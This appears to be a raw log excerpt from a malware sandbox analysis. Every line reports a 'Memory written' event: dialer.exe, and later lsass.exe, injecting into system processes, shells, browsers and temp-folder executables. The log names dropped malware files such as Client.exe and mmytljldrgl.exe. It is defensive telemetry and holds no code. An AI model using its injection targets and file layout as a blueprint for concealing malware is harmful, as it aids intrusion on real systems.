Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2CA9DAD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1689C5D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F2DF1B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C41A000000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17A5B3B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: E70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1810BEE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21223F40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E6C0450000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2069B4F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23614180000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B160CA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2CF47BA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 129874A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2095DE80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_78ff17a5ea060c5f\OneApp.IGCC.WinService.exe base: 140522E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 186835B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_ffc75848a6342fdf\jhi_service.exe base: 22A472B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 204DA710000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 207C2110000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2607AF00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 179C7BA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 24897EE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22C945A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe base: 12B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C5899C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 18777E80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C51FC00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27A20940000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1C37A930000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: C40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\DriverStore\FileRepository\cui_dch.inf_amd64_2e49f48165b8de10\igfxEM.exe base: 1CACBE80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D7DB700000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FE81D60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 226DDF60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\SettingSyncHost.exe base: 1F061FD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 232A8500000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EFC4010000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe base: 850000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 285BFF90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B840A80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 14947DE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 12619020000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1AE52AB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1C91BC20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA1FC50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1817F790000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B2FE700000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1750EDC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2CF98D00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AF70FD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2322DD90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1D6B2210000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1ED589B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 12B0AF80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2910F680000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1E202150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 284015A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28559EF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 23ED0700000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1A52A120000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1FA08C50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 19F80AF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe base: 1A3CD430000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 2A4D4710000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1D780110000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1D780460000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 2AE983C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 17B534D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E709590000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E7095F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 28CB5690000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 260B9AD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 260B9F20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 217D6840000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 217D68A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1B6D7450000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 28C0D0C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1C916E30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1C9174B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F5AE890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 27FFEF20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E86D150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E86D900000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1B3EE9C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1B3EEA20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E7E2BB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 25433C40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 2162BBF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 1FDF37C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 205F6620000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 23B8EA40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 23BA8D40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 14A04DF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 19E619D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 2E66F7C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 2CD170E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 154E0B10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 2CD17880000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 154E2A20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 225129D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F09B30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 22512E20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F23EA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1995E010000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 21939E00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 2213C5B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 231896B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 231A3A20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 16028450000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1C7E7310000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 278821D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 23501570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2499BE30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 23D04520000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2499BE60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 258C6320000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\NNPCZ\mmytljldrgl.exe base: 950000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\NNPCZ\mmytljldrgl.exe base: 9A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\schtasks.exe base: 1C090EB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\schtasks.exe base: 1C090EE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 21E693E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 980000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: E40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: F40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 36E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\schtasks.exe base: 1B091DB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 19FE4C90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 22473C20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 19FE50F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 29D8BC80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 22473F70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D7C6010000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1C164D20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2723BB20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1C165070000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2723DD40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1A866E60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A327130000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1A8671C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A3292B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CCC8BF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A2DB600000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CCC9390000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2A2DBA20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\schtasks.exe base: 288B6C20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 1B2A5A80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 263F7530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 1BAA8230000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 263F90A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 2528A950000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 28AB3320000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 292B5970000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1AF49860000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1AF4BAD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 16DC7320000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 29CA7AC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1F5ABDC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 236C5280000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 23EC8230000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 17084C70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 17086CD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1EDCA140000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 29B48F20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 23518C50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2E250AF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2E250B50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 158C9290000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 158C9600000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 21A39A50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 21A39DC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 171F7E00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C191250000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 19CF9BE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 19CF9CE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1824D380000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 141FCAF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E541120000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 141FCE50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27D3DE20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 16F55510000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1E541480000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 27D3FE90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1BFA97D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C371320000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 1BFA9F70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C3732F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 2370FF10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22851D50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 23710260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2286C070000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1F36EA00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 2DE7C5D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 19E573B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\schtasks.exe base: 2094F9C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 1A6596B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\schtasks.exe base: 20950080000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 234E1AA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 234E3690000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 2D04A490000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1E29E6C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 2D04AB10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 250DED30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 250DED60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 2534DF00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1D2C7140000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1FAD08C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 179A7FC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\mshta.exe base: 181AA770000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25B6CC00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25B6E8F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1F21B270000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2F23FF50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FDE0180000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 17A9BA50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2A929670000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 17AA8DD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2A934D20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21B2A3B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1B16FE60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21B2C2E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1B171D90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC7A90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC7AC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WerFault.exe base: 11318760000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC8200000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC8260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC82C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC8320000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1DEC8380000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 1F890960000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 238DA2A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 250EC700000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 250EC7A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 21CDF150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 21CF0A40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2336B7C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2337A1B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 254A7210000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 254A7240000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074046001\62aa2588e0.exe base: 1D5EDE00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 203AE2E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 203AFE20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 26B195A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe base: 8650000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe base: 8650000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe base: 8650000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe base: 8650000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe base: 8650000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe base: 8650000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe base: 8650000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe base: 8650000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe base: 8650000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe base: 8650000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1FA08CB0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe base: 1A3CD8A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe base: 1A3CD8A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe base: 1A3CD8A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe base: 1A3CD8A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe base: 1A3CD8A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe base: 1A3CD8A0000
